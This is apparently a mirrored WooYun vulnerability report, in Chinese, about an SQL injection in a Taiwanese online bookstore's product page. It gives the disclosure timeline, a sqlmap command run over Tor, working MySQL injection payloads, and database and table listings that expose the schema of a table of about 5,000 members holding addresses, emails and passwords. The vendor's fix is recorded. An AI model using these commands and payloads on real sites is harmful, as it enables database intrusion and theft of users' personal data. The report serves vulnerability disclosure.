乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-27: 厂商已经修复漏洞并主动公开,细节向公众公开
台湾某书店SQL注入(影响5千用户)
$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/indexstore.php?product_id=3724" --dbs --is-dba --current-db---Parameter: product_id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=3724 RLIKE (SELECT (CASE WHEN (4957=4957) THEN 3724 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: product_id=3724 AND (SELECT 5470 FROM(SELECT COUNT(*),CONCAT(0x7178707a71,(SELECT (ELT(5470=5470,1))),0x71717a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web application technology: Apache, PHP 5.4.41back-end DBMS: MySQL 5.0current database: 'fembooks_utf8'current user is DBA: Falseavailable databases [2]:[*] fembooks_utf8[*] information_schemaDatabase: fembooks_utf8+----------------+---------+| Table | Entries |+----------------+---------+| orders_product | 6992 || memberdata | 5677 | ===> 五千用户| product | 3824 |<.....>Database: fembooks_utf8Table: memberdata[22 columns]+----------------+---------------------+| Column | Type |+----------------+---------------------+| m_activity | varchar(254) || m_address | varchar(128) | ===> 地址| m_company | varchar(64) || m_country | varchar(64) || m_email | varchar(64) | ===> 电邮| m_fax | varchar(64) || m_id | int(11) unsigned | ===> 身分证?| m_introduction | varchar(254) || m_invoiceno | varchar(64) || m_joindate | date || m_level | tinyint(2) unsigned || m_mobile | varchar(64) | ===> 电邮| m_noe | varchar(64) || m_passwd | varchar(64) | ===> 密码| m_person | varchar(64) || m_pid | varchar(10) || m_president | varchar(64) || m_sales | varchar(64) || m_sex | char(1) || m_tel | varchar(64) || m_username | varchar(64) | ===>用户名| m_web | varchar(128) |+----------------+---------------------+
过滤
危害等级:高
漏洞Rank:17
确认时间:2015-12-14 17:21
感謝通報
2016-01-27:已修復